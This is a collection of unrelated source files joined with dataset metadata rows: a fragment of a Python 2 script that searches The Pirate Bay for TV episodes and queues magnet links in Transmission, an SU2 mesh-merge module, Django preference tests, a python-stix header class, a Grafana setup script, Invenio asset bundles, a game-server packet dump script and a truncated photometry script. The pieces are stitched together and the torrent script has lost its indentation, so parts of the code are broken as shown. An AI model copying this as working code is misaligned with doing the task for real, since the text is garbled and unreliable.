ret = {'is_valid':False,'hd_quality':False}
        #print 'No torrent with the desired season/episode'
return ret
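# --- Illustrative sketch (not part of the original script) -------------------
# Quick, hypothetical self-check of return_torrent_name(); the title is made up.
def _example_parse():
    parsed = return_torrent_name('Supernatural S09E12 720p HDTV x264')
    # expected: {'is_valid': True, 'hd_quality': True, 'season': '09', 'episode': '12'}
    return parsed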
#t = TPB('https://thepiratebay.org')
#first_page = t.search('supernatural').order(ORDERS.SEEDERS.DES).page(0)
def get_torrent_from_page(page):
for torrents in page:
break_tor = False
        #print "torrent is "+str(torrents)
torrent_reg = return_torrent_name(torrents.title)
if (torrent_reg['is_valid'] and torrent_reg['hd_quality']):
if episode == ('s'+torrent_reg['season']+'e'+torrent_reg['episode']):
                print 'Now check whether the uploader is one of the trusted ones'
for uploader in uploaders:
#print 'uploader is '+torrents.user
#print 'uploader configured is '+uploader
if uploader == torrents.user:
print 'OK!!! torrent title is '+torrents.title
print 'OK!!! torrent files is '+str(torrents.files)
print 'uploader is '+torrents.user
print 'number of leechers is '+ str(torrents.leechers)
print 'number of seeders is '+ str(torrents.seeders)
break_tor= True
                        # found the right uploader, break out of this loop now
break
else:
                        print 'skipping torrents from unknown uploaders'
else:
                #print 'Does not match the episode we want. TODO: fetch more pages'
pass
            # found the right torrent, break out of the loop now
if break_tor:
break
return torrents
#for torrents in first_page:
# print 'torrent is '+str(torrents)
# print 'OK!!! torrent title is '+torrents.title
# print 'OK!!! torrent files is '+str(torrents.files)
# print 'uploader is '+torrents.user
# print 'number of leechers is '+ str(torrents.leechers)
# print 'number of seeders is '+ str(torrents.seeders)
#tor_chosen = get_torrent_from_page(first_page)
#print a[0].magnet_link
#for t in a:
# print t
# print t.magnet_link
# print t.size
# print t.user
# print t.leechers
# print t.seeders
# break
# #print a.file
# -*- coding: utf-8 -*-
tc = transmissionrpc.Client('localhost', port=9091)
print tc.get_torrents()
##tc.stop_torrent(1)
##tc.start_torrent(1)
#iny=0
for tor in tc.get_torrents():
print tor.status
print tor
print tor.id
#print tor.magnet_link
#print tor.size
#print tor.user
#print tor.leechers
#print tor.seeders
#print tor.files()
filesr = tor.files()
print filesr
print filesr[0]['name' ]
for files in filesr:
print filesr[files]['name']
#print files
#print a.file
#
##tc.remove_torrent(1)
##tc.remove_torrent(1)
#tc.add_torrent('magnet:?xt=urn:btih:7C9F535CC79E852B6C7707CA5FD6E44908EE4867&dn=the+big+bang+theory+s07e22+hdtv+x264+lol+ettv&tr=http%3A%2F%2Ftracker.trackerfix.com%2Fannounce&tr=udp%3A%2F%2Fopen.demonii.com%3A1337', download_dir = down_dir)
##tc.add_torrent(None,filename=tor_chosen.magnetLink, download_dir = down_dir)
#atr=tc.add_torrent(tor_chosen.magnet_link, download_dir = down_dir)
#for tor in tc.get_torrents():
# print tor.status
# id = tor.id
#print 'id is '+str(id)
#try:
# tre = tc.get_torrent(id)
# #print "transmission-dir = "+tre.comment
# print "name = "+tre.name
# print "commnet = "+tre.downloadDir
# print 'files = '+str(tc.get_files())
# #print "files = "+str(tre.files())
# #for file in tre.files:
# # print 'file is '+str(file)
#except:
# raise
# pass
#print tc.get_torrents ()
#time.sleep(3)
##print tor.magnetLink
#for tor in tc.get_torrents():
# tor.update()
# print tor.status
##print tor.status # downloading, seeding
| gpl-3.0 | -1,485,059,765,586,805,000 | 27.980392 | 242 | 0.695535 | false |
EduardoMolina/SU2 | SU2_PY/SU2/run/merge.py | 1 | 3218 | ## \file merge.py
# \brief python package for merging meshes
# \author T. Economon, T. Lukaczyk, F. Palacios
# \version 7.0.3 "Blackbird"
#
# SU2 Project Website: https://su2code.github.io
#
# The SU2 Project is maintained by the SU2 Foundation
# (http://su2foundation.org)
#
# Copyright 2012-2020, SU2 Contributors (cf. AUTHORS.md)
#
# SU2 is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# SU2 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with SU2. If not, see <http://www.gnu.org/licenses/>.
# ----------------------------------------------------------------------
# Imports
# ----------------------------------------------------------------------
import os, sys, shutil, copy
from .. import io as su2io
from .interface import SOL as SU2_SOL
from .interface import SOL_FSI as SU2_SOL_FSI
# ----------------------------------------------------------------------
# Merge Mesh
# ----------------------------------------------------------------------
def merge( config ):
""" info = SU2.run.merge(config)
Merges mesh with:
SU2.run.SOL() (volume merging)
internal scripts (surface merging)
Assumptions:
config.NUMBER_PART is set
            Skip if config.NUMBER_PART is 1 or less
Inputs:
config - an SU2 config
        Outputs:
info - an empty SU2 State
Executes in:
./
"""
# local copy
konfig = copy.deepcopy(config)
# check if needed
partitions = konfig['NUMBER_PART']
if partitions <= 1:
return su2io.State()
# special cases
special_cases = su2io.get_specialCases(konfig)
# special cases
multizone_cases = su2io.get_multizone(konfig)
# # MERGING # #
if 'FLUID_STRUCTURE_INTERACTION' in multizone_cases:
merge_multizone(konfig)
else:
if 'WRT_UNSTEADY' in special_cases:
merge_unsteady(konfig)
else:
merge_solution(konfig)
# info out (empty)
info = su2io.State()
return info
#: merge
def merge_unsteady( config, begintime=0, endtime=None ):
if not endtime:
endtime = config.EXT_ITER
# SU2_SOL handles unsteady volume merge
merge_solution( config )
return
#: def merge_unsteady()
def merge_solution( config ):
""" SU2.io.merge.merge_solution(config)
general volume surface merging with SU2_SOL
"""
SU2_SOL( config )
return
#: merge_solution( config )
def merge_multizone( config, begintime=0, endtime=None ):
if not endtime:
endtime = config.TIME_ITER
SU2_SOL_FSI( config )
return
#: merge_solution( config )
| lgpl-2.1 | 4,733,021,594,699,282,000 | 25.377049 | 72 | 0.568676 | false |
EliotBerriot/django-dynamic-preferences | tests/test_manager.py | 1 | 3314 | from __future__ import unicode_literals
from django.test import TestCase
from django.core.cache import caches
from django.urls import reverse
from django.contrib.auth.models import User
from dynamic_preferences.registries import (
global_preferences_registry as registry
)
from dynamic_preferences.models import GlobalPreferenceModel
class BaseTest(object):
def tearDown(self):
caches['default'].clear()
class TestPreferences(BaseTest, TestCase):
def test_can_get_preferences_objects_from_manager(self):
manager = registry.manager()
cached_prefs = dict(manager.all())
qs = manager.queryset
self.assertEqual(
len(qs),
len(cached_prefs)
)
self.assertEqual(
list(qs),
list(GlobalPreferenceModel.objects.all())
)
def test_can_get_db_pref_from_manager(self):
manager = registry.manager()
manager.queryset.delete()
pref = manager.get_db_pref(section='test', name='TestGlobal1')
self.assertEqual(pref.section, 'test')
self.assertEqual(pref.name, 'TestGlobal1')
self.assertEqual(
pref.raw_value, registry.get('test__TestGlobal1').default)
def test_do_not_restore_default_when_calling_all(self):
manager = registry.manager()
new_value = 'test_new_value'
manager['test__TestGlobal1'] = new_value
self.assertEqual(manager['test__TestGlobal1'], new_value)
caches['default'].clear()
manager.all()
caches['default'].clear()
self.assertEqual(manager['test__TestGlobal1'], new_value)
self.assertEqual(manager.all()['test__TestGlobal1'], new_value)
def test_invalidates_cache_when_saving_database_preference(self):
manager = registry.manager()
caches['default'].clear()
new_value = 'test_new_value'
key = manager.get_cache_key('test', 'TestGlobal1')
manager['test__TestGlobal1'] = new_value
pref = manager.get_db_pref(section='test', name='TestGlobal1')
self.assertEqual(pref.raw_value, new_value)
self.assertEqual(manager.cache.get(key), new_value)
pref.raw_value = 'reset'
pref.save()
self.assertEqual(manager.cache.get(key), 'reset')
def test_invalidates_cache_when_saving_from_admin(self):
admin = User(
username="admin",
email="[email protected]",
is_superuser=True,
is_staff=True)
admin.set_password('test')
admin.save()
self.client.login(username='admin', password="test")
manager = registry.manager()
pref = manager.get_db_pref(section='test', name='TestGlobal1')
url = reverse(
'admin:dynamic_preferences_globalpreferencemodel_change',
args=(pref.id,)
)
key = manager.get_cache_key('test', 'TestGlobal1')
response = self.client.post(url, {'raw_value': 'reset1'})
self.assertEqual(manager.cache.get(key), 'reset1')
self.assertEqual(manager.all()['test__TestGlobal1'], 'reset1')
response = self.client.post(url, {'raw_value': 'reset2'})
self.assertEqual(manager.cache.get(key), 'reset2')
self.assertEqual(manager.all()['test__TestGlobal1'], 'reset2')
| bsd-3-clause | -1,961,682,040,945,668,000 | 32.14 | 71 | 0.629451 | false |
STIXProject/python-stix | stix/core/stix_header.py | 1 | 5004 | # Copyright (c) 2017, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
from mixbox import fields
import stix
from stix.utils import deprecated
from stix.common import InformationSource, StructuredTextList, Profiles
from stix.common.vocabs import VocabField, PackageIntent
from stix.data_marking import Marking
import stix.bindings.stix_core as stix_core_binding
class STIXHeader(stix.Entity):
"""The STIX Package Header.
Args:
handling: The data marking section of the Header.
information_source: The :class:`.InformationSource` section of the
Header.
package_intents: **DEPRECATED**. A collection of :class:`.VocabString`
defining the intent of the parent :class:`.STIXPackage`.
description: **DEPRECATED**. A description of the intent or purpose
of the parent :class:`.STIXPackage`.
short_description: **DEPRECATED**. A short description of the intent
or purpose of the parent :class:`.STIXPackage`.
title: **DEPRECATED**. The title of the :class:`.STIXPackage`.
Attributes:
profiles: A collection of STIX Profiles the parent
:class:`.STIXPackage` conforms to.
title: **DEPRECATED**. The title of the parent :class:`.STIXPackage`.
"""
_binding = stix_core_binding
_binding_class = _binding.STIXHeaderType
_namespace = 'http://stix.mitre.org/stix-1'
title = fields.TypedField("Title", preset_hook=deprecated.field)
package_intents = VocabField("Package_Intent", PackageIntent, multiple=True, preset_hook=deprecated.field)
descriptions = fields.TypedField("Description", type_=StructuredTextList, preset_hook=deprecated.field)
short_descriptions = fields.TypedField("Short_Description", type_=StructuredTextList, preset_hook=deprecated.field)
handling = fields.TypedField("Handling", Marking)
information_source = fields.TypedField("Information_Source", InformationSource)
profiles = fields.TypedField("Profiles", Profiles)
def __init__(self, package_intents=None, description=None, handling=None,
information_source=None, title=None, short_description=None):
super(STIXHeader, self).__init__()
self.package_intents = package_intents
self.title = title
self.description = StructuredTextList(description)
self.short_description = StructuredTextList(short_description)
self.handling = handling
self.information_source = information_source
self.profiles = None
@property
def description(self):
"""**DEPRECATED**. A single description about the contents or
purpose of this object.
Default Value: ``None``
Note:
If this object has more than one description set, this will return
the description with the lowest ordinality value.
Returns:
An instance of
:class:`.StructuredText`
"""
return next(iter(self.descriptions), None)
@description.setter
def description(self, value):
self.descriptions = StructuredTextList(value)
def add_description(self, description):
"""**DEPRECATED**. Adds a description to the ``descriptions``
collection.
This is the same as calling "foo.descriptions.add(bar)".
"""
deprecated.warn(description)
self.descriptions.add(description)
@property
def short_description(self):
"""**DEPRECATED**. A single short description about the contents or
purpose of this object.
Default Value: ``None``
Note:
If this object has more than one short description set, this will
return the description with the lowest ordinality value.
Returns:
An instance of :class:`.StructuredText`
"""
return next(iter(self.short_descriptions), None)
@short_description.setter
def short_description(self, value):
self.short_descriptions = StructuredTextList(value)
def add_short_description(self, description):
"""**DEPRECATED**. Adds a description to the ``short_descriptions``
collection.
This is the same as calling "foo.short_descriptions.add(bar)".
"""
deprecated.warn(description)
self.short_descriptions.add(description)
def add_package_intent(self, package_intent):
"""**DEPRECATED**. Adds :class:`.VocabString` object to the
:attr:`package_intents` collection.
If the input is not an instance of :class:`.VocabString`, an effort
will be made to convert it into an instance of :class:`.PackageIntent`.
"""
deprecated.warn(package_intent)
self.package_intents.append(package_intent)
def add_profile(self, profile):
"""Adds a profile to the STIX Header. A Profile is represented by a
string URI.
"""
self.profiles.append(profile)
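# --- Illustrative sketch (not part of the original module) -------------------
# A minimal, hypothetical STIXHeader built with the (deprecated) convenience
# fields defined above; the strings are placeholders and deprecation warnings
# are expected when this runs.
def _example_header():
    header = STIXHeader(title="Example package")
    header.add_package_intent("Indicators - Watchlist")
    return header.to_dict()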
| bsd-3-clause | 8,210,940,760,186,117,000 | 34.489362 | 119 | 0.666267 | false |
moio/sumaform | salt/grafana/setup_grafana.py | 1 | 1107 | #!/usr/bin/env python
import base64
import errno
import httplib
import json
import socket
import sys
import time
def do(method, connection, headers, path, body=None):
connection.request(method, path, headers=headers, body=json.dumps(body))
resp = connection.getresponse()
content = resp.read()
if resp.status != 200:
raise IOError("Unexpected HTTP status received on %s: %d" % (path, resp.status))
return json.loads(content)
connection = httplib.HTTPConnection("localhost")
# try to connect, multiple times if ECONNREFUSED is raised
# (service is up but not ready for requests yet)
for retries in range(0, 10):
    try:
        connection.connect()
    except socket.error as e:
        if e.errno != errno.ECONNREFUSED:
            raise e
        print("Connection refused, retrying...")
        time.sleep(1)
    else:
        break  # connected successfully, stop retrying
token = base64.b64encode("admin:admin".encode("ASCII")).decode("ascii")
headers = {
"Authorization" : "Basic %s" % token,
"Content-Type" : "application/json; charset=utf8"
}
do("PUT", connection, headers, "/api/org/preferences", {"homeDashboardId" : 1})
| bsd-3-clause | 7,001,299,087,362,661,000 | 26 | 88 | 0.68112 | false |
RysavyD/platby | models/db_model.py | 1 | 5519 | # coding: utf8
import locale
from mz_wkasa_platby import fix_login, Uc_sa
# Uc_sa - ids of the chart-of-accounts accounts; importing it here makes them visible to controllers and views as well
locale.setlocale(locale.LC_ALL, 'cs_CZ.UTF-8')
class IS_IN_DB_(IS_IN_DB):
def build_set(self):
super(IS_IN_DB_, self).build_set()
records = [(lbl, self.theset[pos]) for pos, lbl in enumerate(self.labels)]
records.sort(key=lambda x: locale.strxfrm(x[0]))
self.labels = [rec[0] for rec in records]
self.theset = [rec[1] for rec in records]
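# A hedged usage sketch (field name is hypothetical; mirrors how IS_IN_DB_ is used for
# idauth_user below) - the validator sorts its option labels with Czech collation:
#   Field('ucet_id', 'reference ucet',
#         requires=IS_IN_DB_(db, db.ucet.id, db.ucet._format))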
db.define_table('ucet',
Field('ucet', length=7),
Field('zkratka', length=3),
Field('nazev', length=100),
format='%(ucet)s - %(nazev)s'
)
db.define_table('kategorie',
Field('idma_dati', db.ucet),
Field('iddal', db.ucet),
Field('vyznam', default=''),
format='%(vyznam)s'
)
db.define_table('typp',
Field('zkratka', length=1),
Field('vyznam', length=40),
format='%(vyznam)s'
)
db.define_table('partner',
Field('idx', 'integer'), # foxpro id
Field('typp_id', db.typp),
Field('ucel', length=40),
Field('nazev', length=60),
Field('ulice', length=40),
Field('psc', length=5),
Field('misto', length=40),
Field('ico', length=10),
Field('kontakt', 'text'),
Field('poznamka', 'text'),
format='%(nazev)s, %(misto)s'
)
db.define_table('fp',
Field('idx', 'integer'), # foxpro id
Field('zauctovana', 'boolean', default=False),
Field('md', db.ucet, label=TFu('nákladový účet 5..'),
comment=TFu('pro zaúčtování faktury [MD=5..,Dal=321], pokud ještě nebylo provedeno')),
Field('partner_id', db.partner, ondelete='SETNULL',),
Field('ucet', length=20),
Field('elektronicky', 'boolean', default=True),
Field('castka', 'decimal(11,2)', default=0.00),
Field('zaloha', 'decimal(11,2)', default=0.00),
Field('no_jejich', length=20),
Field('vystaveno', 'date'),
Field('prijato', 'date'),
Field('splatnost', 'date'),
Field('uhrazeno', 'date'),
Field('zal_uhrazeno', 'date'),
Field('datum_akce', 'date'),
Field('uhrada', length=1),
Field('zal_uhrada', length=1),
Field('vs', length=10),
Field('ss', length=10),
Field('ks', length=4),
Field('vs_akce', length=5),
Field('popis', length=90),
Field('poznamka', 'text'),
format='%(vystaveno)s, %(castka)s, %(no_jejich)s'
)
db.define_table('pohyb',
Field('idauth_user', 'reference auth_user', label=TFu("Uživatel"),
requires=IS_EMPTY_OR(IS_IN_DB_(db, db.auth_user.id, '%(nick)s - %(vs)s'))),
Field('idorganizator', 'reference auth_user', label=TFu("Zadal organizátor"),
readable=False, writable=False,
requires=IS_EMPTY_OR(IS_IN_DB(db, db.auth_user.id, '%(nick)s - %(vs)s'))),
Field('idma_dati', 'reference ucet'),
Field('iddal', 'reference ucet'),
Field('fp_id', db.fp,
requires=IS_EMPTY_OR(IS_IN_DB(db, db.fp.id, db.fp._format)),
represent=lambda id, r=None: db.fp._format % db.fp(id) if id else '',
ondelete='SETNULL',
),
Field('partner_id', db.partner,
requires=IS_EMPTY_OR(IS_IN_DB(db, db.partner.id, db.partner._format)),
represent=lambda id, r=None: db.partner._format % db.partner(id) if id else '',
ondelete='SETNULL',
),
Field('datum', 'datetime',
requires=[IS_NOT_EMPTY(), IS_DATETIME(format=TFu('%d.%m.%Y'))]),
Field('castka', 'decimal(11,2)'),
Field('popis', 'text'),
Field('cislo_uctu', length=30),
Field('kod_banky', length=10),
Field('nazev_banky', length=40),
Field('zakaznik', length=10),
Field('vs', length=10, default=''),
Field('ss', length=10, default=''),
Field('ks', length=4, default=''),
Field('id_pohybu', length=12),
Field('id_pokynu', length=12),
)
db.define_table('systab',
Field('kod', length=12),
Field('hodnota', length=100),
)
db.define_table('loginlog',
Field('idauth_user', 'reference auth_user'),
Field('datum', 'date'),
)
db.define_table('zadost',
Field('zadost', 'datetime', label="Datum žádosti"),
Field('idauth_user', 'reference auth_user', label="Uživatel"),
Field('vyridil_id', 'reference auth_user', label="Vyřídil"),
Field('vs', length=10, label="Symbol",
comment="symbol uživatele"),
Field('ss', length=10, label="Symbol obsol",
comment=""),
Field('typ', 'integer', label='Typ žádosti',
comment='1 sa->wKasa, 2->na BÚ, 3 členství, 4 refundace'),
Field('cislo_uctu', length=30, label='Číslo účtu'),
Field('kod_banky', length=10, label='Kód banky'),
Field('popis', 'text'),
Field('prevod', 'datetime', label='Datum vyřízení'),
Field('zadano', 'decimal(11,2)', label='Žádaná částka'),
Field('prevedeno', 'decimal(11,2)', label='Převedená částka'),
)
db.define_table('clenstvi',
Field('user_id', 'reference auth_user', label="Uživatel"),
Field('group_id', 'reference auth_group', label="Role ve sdružení"),
Field('ode_dne', 'date', label="Ode dne"),
Field('do_dne', 'date', label="Do dne"),
)
fix_login(db, auth, vs_default) # give every user a personal symbol, log logins
## after defining tables, uncomment below to enable auditing
# auth.enable_record_versioning(db)
| agpl-3.0 | -6,709,750,360,438,365,000 | 33.940789 | 94 | 0.581549 | false |
MSusik/invenio | invenio/base/bundles.py | 1 | 2885 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2014 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Base bundles."""
from invenio.ext.assets import Bundle
invenio = Bundle(
"js/invenio.js",
output="invenio.js",
filters="requirejs",
weight=90
)
styles = Bundle(
"css/token-input.css",
"css/token-input-facebook.css",
"css/typeahead.js-bootstrap.css",
"less/base.less",
"css/tags/popover.css",
output="invenio.css",
depends=[
"less/base.less",
"less/base/**/*.less"
],
filters="less,cleancss",
)
# FIXME
#if config.CFG_WEBSTYLE_TEMPLATE_SKIN != "default":
# styles.contents.append("css/" + config.CFG_WEBSTYLE_TEMPLATE_SKIN + ".css")
jquery = Bundle(
"js/jquery.js",
"js/jquery.jeditable.mini.js",
"js/jquery.tokeninput.js",
"js/jquery-caret.js",
"js/typeahead.js",
"js/bootstrap.js",
"js/bootstrap-select.js",
"js/hogan.js",
"js/translate.js",
output="jquery.js",
filters="uglifyjs",
weight=10,
bower={
"jquery": "2.1.0",
"bootstrap": "3.2.0",
"hogan": "3.0.0",
"jquery.jeditable": "http://invenio-software.org/download/jquery/v1.5/js/jquery.jeditable.mini.js",
"jquery.tokeninput": "*"
}
)
# jQuery UI
jqueryui = Bundle(
"js/jqueryui/jquery-ui.custom.js",
"js/jquery-ui-timepicker-addon.js",
filters="uglifyjs",
output="jquery-ui.js",
weight=11,
bower={
"jqueryui": "1.11.0",
"jquery.ui.timepicker": "http://invenoi-software.org/download/jquery/jquery-ui-timepicker-addon-1.0.3.js"
}
)
# if ASSETS_DEBUG and not LESS_RUN_IN_DEBUG
lessjs = Bundle(
"js/less.js",
output="less.js",
filters="uglifyjs",
weight=0,
bower={
"less": "1.7.0"
}
)
# if ASSETS_DEBUG and not REQUIRESJS_RUN_IN_DEBUG
requirejs = Bundle(
"js/require.js",
"js/settings.js",
output="require.js",
filters="uglifyjs",
weight=0,
bower={
"requirejs": "latest"
}
)
# else
almondjs = Bundle(
"js/almond.js",
"js/settings.js",
output="almond.js",
filters="uglifyjs",
weight=0,
bower={
"almond": "latest"
}
)
| gpl-2.0 | 4,890,553,612,865,183,000 | 23.65812 | 113 | 0.625303 | false |
tsdfsetatata/xserver | Server/dump_srv/print_wanyaogu.py | 1 | 3005 | #!/usr/bin/python
# coding: UTF-8
import sys
from socket import *
import struct
import raid_pb2
import wanyaogu_pb2
import login_pb2
import cast_skill_pb2
import move_direct_pb2
import team_pb2
import datetime
import get_one_msg
import scene_transfer_pb2
import horse_pb2
WATCH_PLAYER = {8589935415}
HOST='127.0.0.1'
PORT=13697
PORT=get_one_msg.get_dumpsrv_port()
ADDR=(HOST, PORT)
client=socket(AF_INET, SOCK_STREAM)
client.connect(ADDR)
last_data = ""
player_list = {}
def get_buff_data(t1):
retdata = ""
for buffinfo in t1.buff_info:
tmp = "(%d) " % buffinfo.id
retdata = retdata + tmp
return retdata
while True:
ret, last_data, player_id, msg_id, pb_data = get_one_msg.get_one_msg(client, last_data)
if ret == -1:
break
if ret == 0:
continue
# data_len = data_len - 8 - 16
# msg_format = "=IHH" + str(data_len) + 'sQIHH'
# msg_len, msg_id, seq, pb_data, player_id, t1, t1, t1 = struct.unpack(msg_format, data)
# print "read msg:", msg_id
# if not player_id in WATCH_PLAYER:
# continue;
    # scene transfer 10112
if msg_id == 10112:
req = scene_transfer_pb2.scene_transfer_answer();
req.ParseFromString(pb_data)
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 进入场景[%s]" % (player_id, req.new_scene_id)
    # raid finished 10812
if msg_id == 10812:
req = raid_pb2.raid_finish_notify();
req.ParseFromString(pb_data)
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 副本结算[%s]" % (player_id, req.star)
    # wanyaoka (demon card) list 11401
if msg_id == 11401:
req = wanyaogu_pb2.list_wanyaoka_answer()
req.ParseFromString(pb_data)
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 万妖卡列表[%s]" % (player_id, req.wanyaoka_id)
    # wanyaogu stage start notification 11402
if msg_id == 11402:
req = wanyaogu_pb2.wanyaogu_start_notify()
req.ParseFromString(pb_data)
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 万妖谷开始[%lu]" % (player_id, req.start_time)
    # wanyaogu stage furnace AFK notification 11403
if msg_id == 11403:
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 万妖谷火炉挂机" % (player_id)
    # time synchronization on entering the game
if msg_id == 10007:
req = login_pb2.EnterGameAnswer()
req.ParseFromString(pb_data)
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 进入游戏 %u %d [%u %s %s]" % (player_id, req.curTime, req.direct, req.sceneId, req.posX, req.posZ)
    # 11404 // wanyaoka obtained notification (wanyaoka_get_notify)
if msg_id == 11404:
req = wanyaogu_pb2.wanyaoka_get_notify()
req.ParseFromString(pb_data)
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 获得万妖卡 %s" % (player_id, req.wanyaoka_id)
| gpl-3.0 | 5,305,513,111,979,851,000 | 27.45 | 140 | 0.603515 | false |
deapplegate/wtgpipeline | measure_skew_surface.py | 1 | 68615 | #!/usr/bin/env python
######################
from __future__ import with_statement
import unittest, sys, math, re, os, optparse
import numpy, astropy, astropy.io.fits as pyfits
from scipy import interpolate
import ldac, utilities
######################
__cvs_id__ = "$Id: measure_unstacked_photometry.py,v 1.15 2010-06-07 18:00:24 dapple Exp $"
##############################################################
# USAGE
##############################################################
usage = '''
measure_unstacked_photometry.py -o outfile [ -i instrum ] [ -m mastercat ] [-f] cat1 cat2 ...
Takes individual ldac catalogs and statistically combines flux measurements.
All other columns are copied from the mastercat.
Will recalculate flux errors based on proper Background Aperture RMS,
and will optionally rescale fluxes between images.
'''
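# Example invocation (file names are hypothetical):
#   ./measure_unstacked_photometry.py -o combined.cat -i SUBARU-10_1 -m master.cat \
#       exposure1.cat0 exposure2.cat0 exposure3.cat0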
###############################################################
# DEFAULTS & GLOBALS
###############################################################
__fluxscale_default__ = True
__bad_mag__ = -99
__bad_flux__ = -99
__resampling_sigma_scaling__ = 1.5
################################################################
# USER CALLABLE FUNCTIONS
################################################################
def loadImage(catfile):
'''loadImage
@param catfile string filename for ldac cat produced for an image
@returns Image object needed for measureUnstackedPhotometry'''
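    # A minimal usage sketch (the file name is hypothetical; the catalog must carry the
    # OBJECTS, FIELDS and PHOTINFO extensions this function reads):
    #   image = loadImage('exposure1.cat0')
    #   aper_errors = image.getFluxErr('FLUX_APER')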
cat = ldac.openObjectFile(catfile)
gain = readGain(catfile)
apers = readApers(catfile)
catbase, ext = os.path.splitext(catfile)
photinfo = ldac.openObjectFile(catfile, 'PHOTINFO')
rms = photinfo['BACKGROUND_RMS']
return Image(cat, rms, apers, gain)
################################################################
def _isVector(flux):
return len(flux.shape) > 2
####
def _noFlagsMatch(flags, flagno):
return not (flags == flagno).any()
####
def measureUnstackedPhotometry(images,
fluxkey = 'FLUX_APER',
fluxscale = False):
'''measureUnstackedPhotometry
@param images A list of Image objects for each input catalog
@param fluxkey Key in each image catalog with flux measurement
@param fluxscale Rescale fluxes between images before combining
@returns chip id : (flux, fluxerr) dictionary for each chip type'''
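    # A minimal usage sketch (assumes 'images' were built with loadImage and contain
    # objects flagged on chip 1):
    #   perchip = measureUnstackedPhotometry(images, fluxkey='FLUX_APER', fluxscale=True)
    #   flux, fluxerr = perchip[1]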
fluxtype = utilities.extractFluxType(fluxkey)
fluxerr_key = 'FLUXERR_%s' % fluxtype
fluxs = _stackFluxs([ image.cat[fluxkey] for image in images ])
origErrs = _stackFluxs([ image.cat[fluxerr_key] for image in images ])
errs = _stackFluxs([ image.getFluxErr(fluxkey) for image in images ])
flag = _stackFluxs([image.cat['Flag'] for image in images])
MaxVal = _stackFluxs([image.cat['MaxVal'] for image in images])
BackGr = _stackFluxs([image.cat['BackGr'] for image in images])
peakvals = MaxVal + BackGr
imaflags = _stackFluxs([image.cat['IMAFLAGS_ISO'] for image in images])
combinedFluxs = {}
for chipId in [1,2,4,8]:
if _noFlagsMatch(imaflags, chipId):
continue
mask = cuts(fluxs, origErrs, peakvals, numpy.ones_like(fluxs))
mask = _setMask(mask, imaflags != chipId)
if fluxscale:
mags, magerrs = calcMags(fluxs, errs)
fluxscalingMask = createFluxScalingMask(fluxs, flag, mask)
fluxscalings = measureFluxScaling(mags, magerrs, fluxscalingMask)
fluxs = fluxscalings*fluxs
for i in xrange(len(images)):
if _isVector(fluxs):
errs[:,:,i] = images[i].getFluxErr(fluxkey, fluxscalings[:,i])
else:
errs[:,i] = images[i].getFluxErr(fluxkey, fluxscalings[i])
flux, err = statCombineFluxs(fluxs, errs, mask)
combinedFluxs[chipId] = (flux, err)
return combinedFluxs
######################################################################
def combineCats(images, instrum=None, mastercat=None, fluxscale = False):
    '''combineCats Given input image objects, returns a catalog with statistically combined fluxes and magnitudes
@param images List of Image objects describing each input ldac catalog
@param instrum Instrument name to be included in each output flux column
@param mastercat Catalog containing other relevant data to be propagated to the output catalog
@param fluxscale Perform fluxscaling between images
@returns ldac.LDACCat A catalog where all flux measurements have been statistically combined
'''
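    # A minimal usage sketch (instrument tag is hypothetical; the per-chip column naming
    # it produces is exercised by the tests below):
    #   cat = combineCats(images, instrum='SUBARU-10_1', mastercat=master, fluxscale=True)
    #   fluxes = cat['FLUX_APER-SUBARU-10_1-1']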
if len(images) == 0:
return
if len(images) == 1:
return images[0].cat
referencecat = images[0].cat
fluxkeys, fluxerrkeys, magonlykeys, otherkeys = utilities.sortFluxKeys(referencecat.keys())
if mastercat is None:
mastercat = referencecat
else:
ignoreFluxkeys, ignoreFluxerrkeys, magonlykeys, otherkeys = utilities.sortFluxKeys(mastercat.keys())
cols = []
for key in otherkeys:
cols.append(mastercat.extractColumn(key))
for fluxkey in fluxkeys:
fluxType = utilities.extractFluxType(fluxkey)
fluxs = measureUnstackedPhotometry(images, fluxkey = fluxkey,
fluxscale = fluxscale)
for chipid, (flux, err) in fluxs.iteritems():
if instrum is None:
id = '%d' % chipid
else:
id = '%s-%d' % (instrum, chipid)
fluxerr_key = 'FLUXERR_%s' % fluxType
if len(flux.shape) == 1:
cols.append(pyfits.Column(name='%s-%s' % (fluxkey, id),
format='E',
array=flux))
cols.append(pyfits.Column(name='%s-%s' % (fluxerr_key, id),
format='E',
array=err))
else:
nelements = flux.shape[1]
cols.append(pyfits.Column(name='%s-%s' % (fluxkey, id),
format='%dE' % nelements,
array=flux))
cols.append(pyfits.Column(name='%s-%s' % (fluxerr_key, id),
format='%dE' % nelements,
array=err))
return ldac.LDACCat(pyfits.BinTableHDU.from_columns(pyfits.ColDefs(cols),
header=mastercat.hdu.header))
#################################################################
# MAIN
#################################################################
def _transferOtherHDUs(catfile):
hdulist = pyfits.open(catfile)
otherhdus = []
for hdu in hdulist:
try:
if hdu.header['EXTNAME'] != 'OBJECTS':
otherhdus.append(hdu)
except KeyError:
pass
return otherhdus
def main(args = sys.argv):
parser = optparse.OptionParser(usage = usage)
parser.add_option('-o', '--outfile',
help = 'output catalog name',
dest = 'outfile')
parser.add_option('-i', '--instrum',
help = 'Instrument tag',
dest = 'instrum')
